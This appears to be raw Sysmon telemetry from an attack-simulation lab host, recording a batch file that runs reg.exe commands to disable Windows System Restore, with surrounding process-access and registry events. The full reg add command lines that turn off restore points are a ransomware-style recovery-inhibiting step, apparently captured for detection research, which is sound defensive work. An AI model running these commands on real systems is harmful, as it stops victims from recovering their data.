|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2801-00000000AE01}6112C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2801-00000000AE01}6112C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.745{266CAFBE-6556-6064-2801-00000000AE01}6112C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.724{266CAFBE-6556-6064-2701-00000000AE01}6264C:\Windows\system32\reg.exeHKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfigDWORD (0x00000001) 10341000x80000000000000009166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.724{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2701-00000000AE01}6264C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.724{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.724{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.724{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.724{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.724{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2701-00000000AE01}6264C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.724{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2701-00000000AE01}6264C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.731{266CAFBE-6556-6064-2701-00000000AE01}6264C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 10341000x80000000000000009158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.709{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.709{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.709{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.709{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.709{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.678{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.662{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 13241300x80000000000000009141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localInvDBSetValue2021-03-31 12:04:38.662{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Temp\1.batBinary Data 10341000x80000000000000009140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.646{266CAFBE-646C-6064-1300-00000000AE01}12283856C:\Windows\System32\svchost.exe{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.646{266CAFBE-646C-6064-1300-00000000AE01}12283856C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 